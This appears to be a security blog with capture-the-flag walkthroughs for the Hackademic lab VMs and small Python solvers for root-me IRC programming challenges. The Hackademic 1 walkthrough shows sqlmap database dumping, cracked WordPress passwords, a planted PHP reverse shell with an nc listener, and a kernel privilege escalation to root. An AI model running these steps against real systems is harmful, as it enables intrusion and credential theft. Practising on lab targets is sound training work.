Sunday 31 January 2016

Hackademic 2

Hackademic Level 2.

Methodology will be very similar with Hackademic 1 walkthrough
root@osboxes:~# nmap -sn 192.168.1.0/24
We have got following result
Nmap scan report for 192.168.1.103
Host is up (0.0011s latency).
MAC Address: 00:0C:29:74:B5:21 (VMware)
We know that our target has 192.168.1.103 IP address.

Let's enumerate services of our target
root@osboxes:~# nmap -sV 192.168.1.103

Starting Nmap 6.47 ( http://nmap.org ) at 2016-01-31 21:34 GMT
Nmap scan report for 192.168.1.103
Host is up (0.00088s latency).
Not shown: 998 closed ports
PORT    STATE    SERVICE VERSION
80/tcp  open     http    Apache httpd 2.2.14 ((Ubuntu))
666/tcp filtered doom
MAC Address: 00:0C:29:74:B5:21 (VMware)
We are able to browse the web application


We noticed very interesting web based form with username and password fields.
Let's examine the web form toward SQL Injection vulnerability
root@osboxes:~# sqlmap -u "http://192.168.1.103/" --forms --level 5 --risk 3
But, unfortunately both parameters are not vulnerable.
Wen we are trying guess credentials, the web application redirect us to /check.php page.
The source of check.php is also not interesting, maybe dirbuster cover something interesting.


 


















The phpmyadmin doesn't allow default credentials and I didn't perform brute-force attack.
Let's look at our nmap scanning result again...
We see that we have tcp/666 filtered. Maybe we should find some UDP ports?
 TBU

Ecoded_string

Second Programming challenge from root-me. For me, also it requires basic programming skills.


Statement
To start this challenge, you must send a private message to bot Candy: !ep2

- The bot answer you by a private message.
- This is a series of encoded characters.
- You must send him the decoded message.
- You have 2 seconds.
- If the bot does not respond, then you have been banned. Just wait a few minutes.
- The answer must be sent as :
!ep2 -rep <answer>

Exploit
import socket
import base64

try:
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect(('irc.root-me.org',6667))
 s.send('NICK rootek\r\n')
 print s.recv(1024000)
 s.send('USER rootek 0 * :Real Name\r\n')
 print s.recv(1024000)
 s.send("JOIN #root-me_challenge\r\n")
 print s.recv(20140000)
 message = s.send("PRIVMSG Candy !ep2\r\n")
 answer = s.recv(128).split(' :')[1].replace(' ','')
 print answer
 s.send("PRIVMSG Candy !ep2 -rep " + str(base64.b64decode(answer) + "\r\n"))
 print s.recv(10240)
 s.send('QUIT')
 print "Connection closed"

except Exception,e:
 print e
 

Go_back_to_the_college

Hi,
Maybe, someone heard about root-me challenge. I have written exploit to the first Programming challenge and I would like to present the exploit. For me, this challenge requires basic programming skills.

Statement

To start the challenge using IRC, you must send a private message to bot Candy : !ep1. The bot replies with a message in private with a string like this:
<number1>/<number2>
- You must calculate the square root of the number n°1 and multiply the result by the number n°2.
- Then you need to round to two decimals.
- You have 2 seconds to send the correct answer from the time the bot gets the message !ep1
- If the bot does not respond, then you have been banned. Just wait a few minutes.
- The answer must be sent as :
!ep1 -rep <answer>.
Exploit
import socket
import math

try:
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect(('irc.root-me.org',6667))
 s.send('NICK foo\r\n')
 print s.recv(1024000)
 s.send('USER foo 0 * :Real Name\r\n')
 print s.recv(1024000)
 s.send("JOIN #root-me_challenge\r\n")
 print s.recv(20140000)
 message = s.send("PRIVMSG Candy !ep1\r\n")
 answer = s.recv(128).split(' :')[1].replace(' ','')
 first = math.sqrt(float(answer.split("/")[0]))
 second = answer.split("/")[1].strip('\n')
 res = first * int(second)
 print "{li:.2f}".format(li = res)
 s.send('PRIVMSG Candy !ep1 -rep ' + str("{li:.2f}".format(li = res)) + "\r\n")
 print s.recv(1024000)
 s.send('QUIT')
 print "Connection closed"

except Exception,e:
 print e

Hackademic 1


Probably many of you heard about OSCP (Offensive Security Certified Professional) cerification.
If so, and you are wondering about trying this hard certification, this solution of Hackademic 1, may be helpful for you.

I run Kali Linux and our target via VMware Workstation.

At the beginning we have to perform scanning, and find our target IP. So, our target has 192.168.1.103 IP address. Let's play the ball!


















and enumerate services of our target












Great! We are able to browse the web application. We see following webpage:


















Nothing interesting... Hmmm, maybe will be something in source?














We verified that the web application uses WordPress version 1.5.1.1 (so old) - that is a juicy information!
Now we know that admin panel will be in one of the following default localizations: wp-admin.php, wp-login.php, login.php or admin.php.
But in spite of this finding, we don't have credentials.

Dirbuster guessed several files and directories


















While walking through the application I paid attention to following URL:
http://192.168.1.103/Hackademic_RTB1/?cat=1
Maybe cat parameter is vulnerable to SQL Injection for example?

I run sqlmap:
sqlmap -u "http://192.168.1.103/Hackademic_RTB1/?cat=1" --level 5 --risk 3 -p cat
BINGO! cat parameter is vulnerable!
We retrieved names of databases
sqlmap -u "http://192.168.1.103/Hackademic_RTB1/?cat=1" --level 5 --risk 3 -p cat --dbs















The wordpress database looks interesting...
sqlmap -u "http://192.168.1.103/Hackademic_RTB1/?cat=1" --level 5 --risk 3 -p cat -D wordpress --tables















The wp-users table may contain WordPress credentials....
sqlmap -u "http://192.168.1.103/Hackademic_RTB1/?cat=1" --level 5 --risk 3 -p cat -D wordpress -T wp_users --dump
 We have got credentials
NickJames | admin
JohnSmith | PUPPIES
GeorgeMiller | q1w2e3
TonyBlack | napoleon
JasonKonnors | maxwell
MaxBucky | kernel
 So we have to find who is an administrator, because an administrator of WordPress is able to upload files (in particular PHP code).

We visit
http://192.168.1.103/Hackademic_RTB1/wp-login.php
 and now we are sure that GeorgeMiller account is the most important, because has access to upload files feature.





















We are able to copy content of webshell from kali and paste to the wp-content/plugins/hello.php
/usr/share/webshells/php/php-reverse-shell.php
I set up
$ip = my IP;
$port = 4444;

and I execute NetCat
nc -nlvp 4444
We have to also open URL











Excellent!! We have got limited shell!
The first of all, we execute following command
python -c "import pty;pty.spawn('/bin/bash')"
This command gives us trust CLI.
We don't have access to content of /home directory, we are able to find credentials to MySQL. Unfortunately raptor_udf2 exploit doesn't work.
Also cat /etc/shadow doesn't work, because apache user doesn't have privilege to open /etc/shadow file.
Maybe our target OS is out of date? Let's try!
bash-4.0$ uname -a
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
OK! Let's find some exploit for Linux 2.6.X to escalate our privileges
Searching...
I find Linux Kernel <= 2.6.36-rc8 - RDS Protocol Local Privilege Escalation
We have to download the exploit and upload it to vulnerable server and execute of course.


















Amazing! We are root, let's execute

sh-4.0# cat /root/key.txt
cat /root/key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)

$_d&jgQ>>ak\#b"(Hx"o<la_%

Regards,
mr.pr0n || p0wnbox.Team || 2011
 Game over

Hello everyone!

If you are looking for juicy information about hacking and information security, this blog is for you!